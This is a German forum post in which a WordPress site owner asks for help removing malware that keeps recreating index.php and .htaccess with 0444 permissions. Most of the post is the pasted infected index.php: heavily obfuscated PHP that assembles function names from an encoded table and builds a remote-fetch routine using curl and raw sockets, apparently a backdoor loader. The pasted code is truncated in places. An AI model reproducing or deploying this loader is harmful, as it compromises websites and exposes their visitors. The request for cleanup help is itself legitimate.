WordPress erstellt weiterhin index.php- und .htaccess-Dateien und ändert die Berechtigung auf 0444


Bambus

Ich muss eine Website reparieren, die mit Malware infiziert ist. Wenn ich versuche, auf den WP Admin zuzugreifen, heißt es “zu viele Weiterleitungen”.

Das Hosting-Unternehmen hat einen Scan durchgeführt, es gab zu viele infizierte Dateien. Ich habe es geschafft, alle außer index.php im Ordner public_html zu entfernen. Der Code in index.php lautet:

<?php

$O0_O00_OO_='xaoH6Rs0zcxDeo5viLrz8MgweN9D5k9tmY225gw0sLaX9Yk0aLkm3dop7Z2XnJjxjdeWyV7lib1ik5sjmbh2c01=';

$O0OOO0_0__=urldecode("%6E1%7A%62%2F%6D%615%5C%76%740%6928%2D%70%78%75%71%79%2A6%6C%72%6B%64%679%5F%65%68%63%73%77%6F4%2B%6637%6A");$OO_O_0O_00=$O0OOO0_0__{16}.$O0OOO0_0__{24}.$O0OOO0_0__{30}.$O0OOO0_0__{27}.$O0OOO0_0__{29}.$O0OOO0_0__{24}.$O0OOO0_0__{30}.$O0OOO0_0__{16}.$O0OOO0_0__{23}.$O0OOO0_0__{6}.$O0OOO0_0__{32}.$O0OOO0_0__{30}.$O0OOO0_0__{29}.$O0OOO0_0__{32}.$O0OOO0_0__{6}.$O0OOO0_0__{23}.$O0OOO0_0__{23}.$O0OOO0_0__{3}.$O0OOO0_0__{6}.$O0OOO0_0__{32}.$O0OOO0_0__{25};$OO0OO__00_=$O0OOO0_0__{33}.$O0OOO0_0__{10}.$O0OOO0_0__{24}.$O0OOO0_0__{30}.$O0OOO0_0__{6}.$O0OOO0_0__{5}.$O0OOO0_0__{29}.$O0OOO0_0__{33}.$O0OOO0_0__{35}.$O0OOO0_0__{32}.$O0OOO0_0__{25}.$O0OOO0_0__{30}.$O0OOO0_0__{10}.$O0OOO0_0__{29}.$O0OOO0_0__{32}.$O0OOO0_0__{23}.$O0OOO0_0__{12}.$O0OOO0_0__{30}.$O0OOO0_0__{0}.$O0OOO0_0__{10};$O0_O__0OO0=$O0OOO0_0__{33}.$O0OOO0_0__{10}.$O0OOO0_0__{24}.$O0OOO0_0__{30}.$O0OOO0_0__{6}.$O0OOO0_0__{5}.$O0OOO0_0__{29}.$O0OOO0_0__{27}.$O0OOO0_0__{30}.$O0OOO0_0__{10}.$O0OOO0_0__{29}.$O0OOO0_0__{5}.$O0OOO0_0__{30}.$O0OOO0_0__{10}.$O0OOO0_0__{6}.$O0OOO0_0__{29}.$O0OOO0_0__{26}.$O0OOO0_0__{6}.$O0OOO0_0__{10}.$O0OOO0_0__{6};$O_O_00OO_0=$O0OOO0_0__{33}.$O0OOO0_0__{10}.$O0OOO0_0__{24}.$O0OOO0_0__{30}.$O0OOO0_0__{6}.$O0OOO0_0__{5}.$O0OOO0_0__{29}.$O0OOO0_0__{33}.$O0OOO0_0__{30}.$O0OOO0_0__{10}.$O0OOO0_0__{29}.$O0OOO0_0__{3}.$O0OOO0_0__{23}.$O0OOO0_0__{35}.$O0OOO0_0__{32}.$O0OOO0_0__{25}.$O0OOO0_0__{12}.$O0OOO0_0__{0}.$O0OOO0_0__{27};$OO_000O__O=$O0OOO0_0__{33}.$O0OOO0_0__{10}.$O0OOO0_0__{24}.$O0OOO0_0__{30}.$O0OOO0_0__{6}.$O0OOO0_0__{5}.$O0OOO0_0__{29}.$O0OOO0_0__{33}.$O0OOO0_0__{30}.$O0OOO0_0__{10}.$O0OOO0_0__{29}.$O0OOO0_0__{10}.$O0OOO0_0__{12}.$O0OOO0_0__{5}.$O0OOO0_0__{30}.$O0OOO0_0__{35}.$O0OOO0_0__{18}.$O0OOO0_0__{10};$O0O__O0_O0=$O0OOO0_0__{38}.$O0OOO0_0__{12}.$O0OOO0_0__{23}.$O0OOO0_0__{30}.$O0OOO0_0__{29}.$O0OOO0_0__{16}.$O0OOO0_0__{18}.$O0OOO0_0__{10}.$O0OOO0_0__{29}.$O0OOO0_0__{32}.$O0OOO0_0__{35}.$O0OOO0_0__{0}.$O0OOO0_0__{10}.$O0OOO0_0__{30}.$O0OOO0_0__{0}.$O0OOO0_0_
_{10}.$O0OOO0_0__{33};$O_OO_000_O=$O0OOO0_0__{38}.$O0OOO0_0__{12}.$O0OOO0_0__{23}.$O0OOO0_0__{30}.$O0OOO0_0__{29}.$O0OOO0_0__{27}.$O0OOO0_0__{30}.$O0OOO0_0__{10}.$O0OOO0_0__{29}.$O0OOO0_0__{32}.$O0OOO0_0__{35}.$O0OOO0_0__{0}.$O0OOO0_0__{10}.$O0OOO0_0__{30}.$O0OOO0_0__{0}.$O0OOO0_0__{10}.$O0OOO0_0__{33};$O00_O__O0O=$O0OOO0_0__{31}.$O0OOO0_0__{10}.$O0OOO0_0__{10}.$O0OOO0_0__{16}.$O0OOO0_0__{29}.$O0OOO0_0__{3}.$O0OOO0_0__{18}.$O0OOO0_0__{12}.$O0OOO0_0__{23}.$O0OOO0_0__{26}.$O0OOO0_0__{29}.$O0OOO0_0__{19}.$O0OOO0_0__{18}.$O0OOO0_0__{30}.$O0OOO0_0__{24}.$O0OOO0_0__{20};$O0OO0_0_O_=$O0OOO0_0__{38}.$O0OOO0_0__{18}.$O0OOO0_0__{0}.$O0OOO0_0__{32}.$O0OOO0_0__{10}.$O0OOO0_0__{12}.$O0OOO0_0__{35}.$O0OOO0_0__{0}.$O0OOO0_0__{29}.$O0OOO0_0__{30}.$O0OOO0_0__{17}.$O0OOO0_0__{12}.$O0OOO0_0__{33}.$O0OOO0_0__{10}.$O0OOO0_0__{33};$OO_0O_O_00=$O0OOO0_0__{32}.$O0OOO0_0__{24}.$O0OOO0_0__{30}.$O0OOO0_0__{6}.$O0OOO0_0__{10}.$O0OOO0_0__{30}.$O0OOO0_0__{29}.$O0OOO0_0__{38}.$O0OOO0_0__{18}.$O0OOO0_0__{0}.$O0OOO0_0__{32}.$O0OOO0_0__{10}.$O0OOO0_0__{12}.$O0OOO0_0__{35}.$O0OOO0_0__{0};$O00O0___OO=$O0OOO0_0__{33}.$O0OOO0_0__{35}.$O0OOO0_0__{32}.$O0OOO0_0__{25}.$O0OOO0_0__{30}.$O0OOO0_0__{10}.$O0OOO0_0__{29}.$O0OOO0_0__{32}.$O0OOO0_0__{35}.$O0OOO0_0__{0}.$O0OOO0_0__{0}.$O0OOO0_0__{30}.$O0OOO0_0__{32}.$O0OOO0_0__{10};$OO00_O0__O=$O0OOO0_0__{27}.$O0OOO0_0__{30}.$O0OOO0_0__{
///SOME CODE IS MISSING BECAUSE OF 30K LIMIT
0OOO0_0__{26};$OO000O__O_=$O0OOO0_0__{10}.$O0OOO0_0__{24}.$O0OOO0_0__{12}.$O0OOO0_0__{5};$OOO0_0O0__=$O0OOO0_0__{10}.$O0OOO0_0__{12}.$O0OOO0_0__{5}.$O0OOO0_0__{30};$O_0OO0_O0_=$O0OOO0_0__{41}.$O0OOO0_0__{35}.$O0OOO0_0__{12}.$O0OOO0_0__{0};$O0_OOO00__=$O0OOO0_0__{38}.$O0OOO0_0__{30}.$O0OOO0_0__{35}.$O0OOO0_0__{38};$OOO_000O__=$O0OOO0_0__{5}.$O0OOO0_0__{26}.$O0OOO0_0__{7};if(!function_exists('str_ireplace')){function str_ireplace($from,$to,$string){return trim(preg_replace("/".addcslashes($from,"?:\\/*^$")."/si",$to,$string));}};$O_0__O0OO0=${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x4f\x5f\x30\x4f\x5f\x4f\x5f\x30\x30"]('$url,$OO0OO0_0__=0,$O_0_00_OOO=1,$O_0OO0O__0=NULL,$OO0_O0O__0=array(),$O_O0O0__0O=\'shell\'','if(!${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x30\x5f\x4f\x4f\x5f\x4f\x5f\x30\x30"]("/^https*\\:\\/\\//si",$url)){if(isset(${"\x5f\x47\x45\x54"}["\x75\x72\x6c\x65\x72\x72"])){$O_OO00O0__=${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x30\x5f\x30\x5f\x4f\x4f\x30\x5f\x4f"](\'iy4tyhTkktKsovilXIzCtLzMlMUQCKWKnlJRUtPXWAMA\');$O_OO00O0__.=$url;echo $O_OO00O0__;unset($O_OO00O0__);exit();}return \'\';}$OO0_0_0O_O=${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x30\x5f\x30\x5f\x4f\x4f\x30\x5f\x4f"](\'Sy4tyhTonPzMss0U4GsYpTS/ILoOzUitTkmrTi/OTs/ILUvJoCBLO4pCg1MTcexE8tiU/OyUzNK6mB8YBtPSJakA\');$OO_00OO_0_=$O_O__00O0O=\'\';foreach(${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x4f\x5f\x4f\x4f\x30\x5f\x30\x5f\x30"](\'|\',$OO0_0_0O_O) as $c){$OO00OO___0=1;if($OO0OO0_0__&&substr($c,0,1)==\'c\'){continue;}foreach(${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x4f\x5f\x4f\x4f\x30\x5f\x30\x5f\x30"](\'+\',$c) as $d){if(!${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x30\x4f\x4f\x30\x5f\x30\x5f\x4f\x5f"]($d)){$OO00OO___0=0;}}unset($d);if($OO00OO___0){$OO_00OO_0_=$c;break;}}unset($OO0_0_0O_O,$c);if($OO_00OO_0_==\'\'){return 
0;}if(substr($OO_00OO_0_,0,1)==\'c\'){$O0O___0OO0=${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x30\x5f\x5f\x4f\x5f\x30\x30\x4f\x4f"]();${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x5f\x5f\x4f\x30\x4f\x30\x5f\x4f\x30"]($O0O___0OO0,CURLOPT_URL,$url);${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x5f\x5f\x4f\x30\x4f\x30\x5f\x4f\x30"]($O0O___0OO0,CURLOPT_USERAGENT,$O_O0O0__0O);${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x5f\x5f\x4f\x30\x4f\x30\x5f\x4f\x30"]($O0O___0OO0,CURLOPT_RETURNTRANSFER,1);${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x5f\x5f\x4f\x30\x4f\x30\x5f\x4f\x30"]($O0O___0OO0,CURLOPT_TIMEOUT,100);${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x5f\x5f\x4f\x30\x4f\x30\x5f\x4f\x30"]($O0O___0OO0,CURLOPT_FRESH_CONNECT,TRUE);if($O_0_00_OOO==2){${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x5f\x5f\x4f\x30\x4f\x30\x5f\x4f\x30"]($O0O___0OO0,CURLOPT_POST,1);if(${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x30\x4f\x5f\x5f\x5f\x30\x4f\x30\x4f"]($O_0OO0O__0)){${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x5f\x5f\x4f\x30\x4f\x30\x5f\x4f\x30"]($O0O___0OO0,CURLOPT_POSTFIELDS,${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x30\x30\x5f\x4f\x5f\x5f\x4f\x30\x4f"]($O_0OO0O__0));}}$O_0O__O00O=${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x5f\x30\x4f\x30\x5f\x30\x4f\x4f\x5f"]($O0O___0OO0);${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x30\x5f\x4f\x30\x4f\x30\x4f\x5f\x5f"]($O0O___0OO0);if(!$O_0O__O00O){if(isset(${"\x5f\x47\x45\x54"}["\x63\x75\x72\x6c\x65\x72\x72"])){$O_OO00O0__=${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x30\x5f\x30\x5f\x4f\x4f\x30\x5f\x4f"](\'i04uLhTcpRSC0qyi+KVctLKi6tPwBgA=\');$O_OO00O0__.=${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x5f\x4f\x30\x4f\x30\x5f\x5f\x4f\x30"]($O0O___0OO0);echo $O_OO00O0__;unset($O_OO00O0__);exit();}return 0;}else{$O_0O__O00O=${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x4f\x30\x30\x30\x4f\x5f\x5f\x4f\x5f"](${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x4f\x30\x30\x30\x4f\x5f\x5f\x4f\x5f"]($O_0O__O00O,"\\xEF\\xBB\\xBF"));return 
$O_0O__O00O;}}$O0_O_0_O0O=${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x4f\x5f\x5f\x30\x30\x30\x4f\x5f\x4f"]($url);isset($O0_O_0_O0O["\x68\x6f\x73\x74"])||$O0_O_0_O0O["\x68\x6f\x73\x74"]=\'\';isset($O0_O_0_O0O["\x70\x61\x74\x68"])||$O0_O_0_O0O["\x70\x61\x74\x68"]=\'\';isset($O0_O_0_O0O["\x71\x75\x65\x72\x79"])|| $O0_O_0_O0O["\x71\x75\x65\x72\x79"]=\'\';isset($O0_O_0_O0O["\x4f\x30\x4f\x30\x5f\x5f\x4f\x5f\x30\x4f"])||$O0_O_0_O0O["\x4f\x30\x4f\x30\x5f\x5f\x4f\x5f\x30\x4f"]=\'\';$O__OOO00_0=$O0_O_0_O0O["\x70\x61\x74\x68"]?$O0_O_0_O0O["\x70\x61\x74\x68"].($O0_O_0_O0O["\x71\x75\x65\x72\x79"]?\'?\'.$O0_O_0_O0O["\x71\x75\x65\x72\x79"]:\'\'):\'/\';$OOO00O0___=$O0_O_0_O0O["\x68\x6f\x73\x74"];if($O0_O_0_O0O["\x73\x63\x68\x65\x6d\x65"]==\'https\'){$O00_OO__0O=\'1.1\';$O0O0__O_0O=empty($O0_O_0_O0O["\x4f\x30\x4f\x30\x5f\x5f\x4f\x5f\x30\x4f"])?443:$O0_O_0_O0O["\x4f\x30\x4f\x30\x5f\x5f\x4f\x5f\x30\x4f"];$OOO00O0___=${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x30\x5f\x30\x5f\x4f\x4f\x30\x5f\x4f"](\'Ky7OshTdLtPXBwA=\');$OOO00O0___.=$O0_O_0_O0O["\x68\x6f\x73\x74"];}else{$O00_OO__0O=\'1.0\';$O0O0__O_0O=empty($O0_O_0_O0O["\x4f\x30\x4f\x30\x5f\x5f\x4f\x5f\x30\x4f"])?80:$O0_O_0_O0O["\x4f\x30\x4f\x30\x5f\x5f\x4f\x5f\x30\x4f"];}$O0OO_0O0__=\'Host:\';$O0OO_0O0__.=$OOO00O0___;$OO0_O0O__0[]=$O0OO_0O0__;$OO0_O0O__0[]=${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x30\x5f\x30\x5f\x4f\x4f\x30\x5f\x4f"](\'c87PyhT0tNLsnMz7NyzsktPvTgUA\');$OO0_O0O__0[]=${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x30\x5f\x30\x5f\x4f\x4f\x30\x5f\x4f"](\'Cy1OLhTdJ1TE/NK7EtPCAA==\').$O_O0O0__0O;$OO0_O0O__0[]=${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x30\x5f\x30\x5f\x4f\x4f\x30\x5f\x4f"](\'c0xOThTi0osdLtPS1wIA\');unset($O0OO_0O0__);if($O_0_00_OOO==2){if(${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x30\x4f\x5f\x5f\x5f\x30\x4f\x30\x4f"]($O_0OO0O__0)){$O_0OO0O__0=${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x30\x30\x5f\x4f\x5f\x5f\x4f\x30\x4f"]($O_0OO0O__0);}$OO0_O0O__0[]=${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x30\x5f\x30\x5f\x4f\x4f\x30\x5f\x4f"](\'c87P
KhT0nNK9EtqSxItUosKMjJTE4syczP06/QLS8v103LL8rVLS3KSc1Lzk9tPJTQEA\');$OO0_O0O__0[]=${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x30\x5f\x30\x5f\x4f\x4f\x30\x5f\x4f"](\'c87PKhT0nNK9H1Sc1LL8mtPwAgA=\').${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x5f\x4f\x5f\x30\x30\x5f\x4f\x4f\x30"]($O_0OO0O__0);$O_O__00O0O="POST $O__OOO00_0 HTTP/$O00_OO__0O\\r\\n".${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x5f\x30\x4f\x4f\x30\x5f\x4f\x30\x5f"]("\\r\\n",$OO0_O0O__0)."\\r\\n\\r\\n".$O_0OO0O__0;unset($O_0OO0O__0);}else{$O_O__00O0O="GET $O__OOO00_0 HTTP/$O00_OO__0O\\r\\n".${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x5f\x30\x4f\x4f\x30\x5f\x4f\x30\x5f"]("\\r\\n",$OO0_O0O__0)."\\r\\n\\r\\n";}unset($OO0_O0O__0,$O0_O_0_O0O,$O00_OO__0O,$O__OOO00_0);$O_O0O__0O0=null;if(substr($OO_00OO_0_,-1)==\'n\'){$O_O0O__0O0=$OO_00OO_0_($OOO00O0___,$O0O0__O_0O,$O_OO00O0__no,$O_OO00O0__str,30);}else{if(substr($OO_00OO_0_,-1)==\'t\'){$O_O__O0O00=${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x30\x5f\x30\x5f\x4f\x4f\x30\x5f\x4f"](\'K0kushTNLtPXBwA=\');$O_O__O0O00.=$OOO00O0___;$O_O__O0O00.=\':\';$O_O__O0O00.=$O0O0__O_0O;$O_O0O__0O0=${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x4f\x30\x4f\x4f\x5f\x5f\x30\x30\x5f"]($O_O__O0O00,$O_OO00O0__no,$O_OO00O0__str,30);unset($O_O__O0O00);}}$O_OO00__0O=\'\';if($O_O0O__0O0){${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x5f\x4f\x5f\x30\x30\x4f\x4f\x5f\x30"]($O_O0O__0O0,true);${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x4f\x5f\x30\x30\x30\x4f\x5f\x5f\x4f"]($O_O0O__0O0,30);${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x4f\x5f\x5f\x30\x30\x5f\x4f\x4f\x30"]($O_O0O__0O0,$O_O__00O0O);if(!$OO0OO0_0__){$O_0_O00_OO=${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x30\x5f\x4f\x5f\x5f\x30\x4f\x4f\x30"]($O_O0O__0O0);if(!$O_0_O00_OO["\x74\x69\x6d\x65\x64\x5f\x6f\x75\x74"]){while(!${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x30\x5f\x4f\x4f\x4f\x30\x30\x5f\x5f"]($O_O0O__0O0)){$O_0O0OO_0_=${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x30\x5f\x30\x30\x4f\x4f\x4f\x5f\x5f"]($O_O0O__0O0);if($O_0O0OO_0_&&($O_0O0OO_0_=="\\r\\n"||$O_0O0OO_0_=="\\n")){break;}uns
et($O_0O0OO_0_);}while(!${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x30\x5f\x4f\x4f\x4f\x30\x30\x5f\x5f"]($O_O0O__0O0)){$O_O_0O00_O=${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x30\x4f\x30\x4f\x5f\x5f\x30\x4f\x5f"]($O_O0O__0O0,8192);$O_OO00__0O.=$O_O_0O00_O;unset($O_O_0O00_O);}}unset($O_0_O00_OO);}${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x5f\x5f\x4f\x30\x30\x4f\x4f\x30\x5f"]($O_O0O__0O0);}else{if(substr($OO_00OO_0_,-1)==\'e\'){$O0O_0O0_O_=${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x4f\x30\x30\x5f\x4f\x30\x5f\x5f\x4f"]($OOO00O0___);$O_O0O__0O0=$OO_00OO_0_(AF_INET,SOCK_STREAM,0);if(${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x30\x30\x4f\x30\x5f\x5f\x5f\x4f\x4f"]($O_O0O__0O0,$O0O_0O0_O_,$O0O0__O_0O)){if(!$OO0OO0_0__){${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x5f\x4f\x5f\x30\x4f\x5f\x30\x4f\x30"]($O_O0O__0O0,$O_O__00O0O,${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x5f\x4f\x5f\x30\x30\x5f\x4f\x4f\x30"]($O_O__00O0O));while($O0O0O0O___=@${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x5f\x4f\x5f\x30\x5f\x30\x30\x4f\x4f"]($O_O0O__0O0,8192)){$O_OO00__0O.=$O0O0O0O___;unset($O0O0O0O___);}$O_OO00__0O=${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x4f\x5f\x4f\x4f\x30\x5f\x30\x5f\x30"]("\\r\\n\\r\\n",$O_OO00__0O);${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x5f\x5f\x5f\x30\x4f\x4f\x30\x4f\x30"]($O_OO00__0O);$O_OO00__0O=${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x5f\x5f\x4f\x30\x5f\x4f\x30\x4f\x30"]("\\r\\n\\r\\n",$O_OO00__0O);}else{$O_O_00_O0O=${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x30\x4f\x5f\x5f\x30\x5f\x4f\x4f\x30"](2,5);$O_00OO0O__=0;while($O_00OO0O__<$O_O_00_O0O){${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x5f\x4f\x5f\x30\x4f\x5f\x30\x4f\x30"]($O_O0O__0O0,$O_O__00O0O,${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x5f\x4f\x5f\x30\x30\x5f\x4f\x4f\x30"]($O_O__00O0O));$O_00OO0O__++;${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x30\x30\x5f\x4f\x4f\x5f\x5f\x4f\x30"](${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x30\x4f\x5f\x5f\x30\x5f\x4f\x4f\x30"](50000,100000));}unset($O_00OO0O__,$O_O_00_O0O);}}${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x4f\x5f\x30\
x5f\x30\x30\x4f\x4f\x5f"]($O_O0O__0O0);unset($O0O_0O0_O_);}}unset($O_O__00O0O,$OO_00OO_0_,$O_O0O__0O0,$O0O0__O_0O,$OOO00O0___);if(!$OO0OO0_0__){$O_OO00__0O=${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x4f\x5f\x4f\x5f\x30\x4f\x5f\x30\x30"](\'/(?:(?:\\r\\n|\\n)|^)([0-9A-F]+)(?:\\r\\n|\\n){1,2}(.*?)\'.\'((?:\\r\\n|\\n)(?:[0-9A-F]+(?:\\r\\n|\\n))|$)/si\',${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x4f\x5f\x30\x4f\x5f\x4f\x5f\x30\x30"](\'$matches\',\'return ${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x30\x30\x5f\x30\x5f\x5f\x4f\x4f\x4f"]($matches[1])==${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x5f\x4f\x5f\x30\x30\x5f\x4f\x4f\x30"]($matches[2])?$matches[2]:$matches[0];\'),$O_OO00__0O);return ${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x4f\x30\x30\x30\x4f\x5f\x5f\x4f\x5f"](${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x4f\x30\x30\x30\x4f\x5f\x5f\x4f\x5f"]($O_OO00__0O,"\\xEF\\xBB\\xBF"));}else{return 1;}');$OOO__000_O=${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x4f\x5f\x30\x4f\x5f\x4f\x5f\x30\x30"]('$OOO0__0O_0','$O_O_0OO0_0=${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x4f\x5f\x5f\x4f\x30\x30\x30\x5f\x4f"](${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x4f\x5f\x4f\x30\x30\x4f\x30\x5f\x5f"]($OOO0__0O_0));$OO__O0O_00=substr($O_O_0OO0_0,0,5);$OOO_00__0O=substr($O_O_0OO0_0,-5);$OO__0O0_O0=substr($O_O_0OO0_0,5,${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x5f\x4f\x5f\x30\x30\x5f\x4f\x4f\x30"]($O_O_0OO0_0)-10);return $OO__O0O_00.\'hT\'.substr($O_O_0OO0_0,5,${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x5f\x4f\x5f\x30\x30\x5f\x4f\x4f\x30"]($O_O_0OO0_0)-10).\'tP\'.$OOO_00__0O;');$O0_0_OO0_O=${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x4f\x5f\x30\x4f\x5f\x4f\x5f\x30\x30"]('$OOO0__0O_0','$OO__O0O_00=substr($OOO0__0O_0,0,5);$OOO_00__0O=substr($OOO0__0O_0,-5);$OO__0O0_O0=substr($OOO0__0O_0,7,${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x5f\x4f\x5f\x30\x30\x5f\x4f\x4f\x30"]($OOO0__0O_0)-14);return 
${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x5f\x5f\x30\x4f\x30\x5f\x30\x4f\x4f"](${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x4f\x5f\x30\x5f\x30\x5f\x30\x4f\x4f"]($OO__O0O_00.$OO__0O0_O0.$OOO_00__0O));');$OO_0O0_0_O=${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x4f\x5f\x30\x4f\x5f\x4f\x5f\x30\x30"]('$OO_OO0__00=\'\'','if(isset(${"\x5f\x53\x45\x52\x56\x45\x52"})){if(isset(${"\x5f\x53\x45\x52\x56\x45\x52"}["\x48\x54\x54\x50\x5f\x58\x5f\x46\x4f\x52\x57\x41\x52\x44\x45\x44\x5f\x46\x4f\x52"])){$OO_OO0__00=${"\x5f\x53\x45\x52\x56\x45\x52"}["\x48\x54\x54\x50\x5f\x58\x5f\x46\x4f\x52\x57\x41\x52\x44\x45\x44\x5f\x46\x4f\x52"];}else if(isset(${"\x5f\x53\x45\x52\x56\x45\x52"}["\x48\x54\x54\x50\x5f\x43\x4c\x49\x45\x4e\x54\x5f\x49\x50"])){$OO_OO0__00=${"\x5f\x53\x45\x52\x56\x45\x52"}["\x48\x54\x54\x50\x5f\x43\x4c\x49\x45\x4e\x54\x5f\x49\x50"];}else{$OO_OO0__00=${"\x5f\x53\x45\x52\x56\x45\x52"}["\x52\x45\x4d\x4f\x54\x45\x5f\x41\x44\x44\x52"];}}else{if(${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x4f\x4f\x30\x5f\x5f\x4f\x30\x5f\x30"](\'HTTP_X_FORWARDED_FOR\')){$OO_OO0__00=${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x4f\x4f\x30\x5f\x5f\x4f\x30\x5f\x30"](\'HTTP_X_FORWARDED_FOR\');}else if(${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x4f\x4f\x30\x5f\x5f\x4f\x30\x5f\x30"](\'HTTP_CLIENT_IP\')){$OO_OO0__00=${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x4f\x4f\x30\x5f\x5f\x4f\x30\x5f\x30"](\'HTTP_CLIENT_IP\');}else{$OO_OO0__00=${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x4f\x4f\x30\x5f\x5f\x4f\x30\x5f\x30"](\'REMOTE_ADDR\');}}return $OO_OO0__00;');$O0_O_O_O00=${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x4f\x5f\x30\x4f\x5f\x4f\x5f\x30\x30"]('$OOO0__0O_0=\'\'','if(isset(${"\x5f\x53\x45\x52\x56\x45\x52"}["\x48\x54\x54\x50\x5f\x48\x4f\x53\x54"])){return ${"\x5f\x53\x45\x52\x56\x45\x52"}["\x48\x54\x54\x50\x5f\x48\x4f\x53\x54"];}elseif(isset(${"\x5f\x53\x45\x52\x56\x45\x52"}["\x53\x45\x52\x56\x45\x52\x5f\x4e\x41\x4d\x45"])){return ${"\x5f\x53\x45\x52\x56\x45\x52"}["\x53\x45\x52\x56\x45\x52\x5f\x4e\x41\x4d\x45"];}return 
